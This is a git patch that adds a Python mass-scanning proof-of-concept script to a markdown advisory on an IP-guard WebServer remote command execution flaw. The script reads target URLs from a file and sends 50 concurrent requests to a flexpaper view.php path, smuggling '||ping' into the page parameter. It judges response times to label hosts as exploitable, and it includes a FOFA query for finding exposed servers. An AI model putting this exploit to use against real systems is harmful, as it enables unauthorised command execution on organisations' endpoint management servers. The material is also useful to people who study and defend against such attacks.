From ba64f44d490a124d0067360746d3435b7ead9495 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 9 Nov 2023 21:20:17 +0800 Subject: [PATCH] =?UTF-8?q?Update=20IP-guard=20WebServer=20=E8=BF=9C?= =?UTF-8?q?=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- IP-guard WebServer 远程命令执行漏洞.md | 75 ++++++++++++++++++++++++++ 1 file changed, 75 insertions(+) diff --git a/IP-guard WebServer 远程命令执行漏洞.md b/IP-guard WebServer 远程命令执行漏洞.md index ae5ba33..b5b6628 100644 --- a/IP-guard WebServer 远程命令执行漏洞.md +++ b/IP-guard WebServer 远程命令执行漏洞.md @@ -20,3 +20,78 @@ IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软 ![](./assets/20231109165256.png) ![](./assets/20231109165333.png) + +## Python脚本 +``` +#!/usr/bin/python3 +# -*- coding:utf-8 -*- +# author:MDSEC +# from:https://github.com/MD-SEC/MDPOCS +# fofa:"IP-guard" && icon_hash="2030860561" +# + + +import sys +import requests +import csv +import urllib3 +import hashlib +from concurrent.futures import ThreadPoolExecutor +import time + +if len(sys.argv) != 2: + print( + '+----------------------------------------------------------------------------------------------------------+') + print( + '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS +') + print( + '+-------------------------------------------------------------------------------------------------- -------+') + print( + '+ USE: python3 +') + print( + '+ EXP: python3 Ip_Guard_Webserver_View_Rce_Poc.py url.txt +') + print( + '+-------------------------------------------------------------------------------------------------- --------+') + sys.exit() +proxysdata = { +'http': '127.0.0.1:8080' +} +def poc(host): + if "http" in host: + url = host + else: + url ="http://"+host + host1=url.replace("http://","") + host2=host1.replace("https://","") + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate, br", + "Host":"%s" % host2 + } + vulurl = url + "/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20www.baidu.com" + try: + start_time = time.time() + r = requests.get(vulurl, headers=headers) + end_time = time.time() + response_time = end_time - start_time + if r.status_code==200 and response_time >2 and response_time<6 : + print(host+" :一定能打") + elif r.status_code==200: + print(host+" :大概率能打") + else: + print(host+" :不能打") + except: + return 0 + print (host+":false") + + +if __name__ == '__main__': + file = sys.argv[1] + data = open(file) + reader = csv.reader(data) + with ThreadPoolExecutor(50) as pool: + for row in reader: + pool.submit(poc, row[0]) +```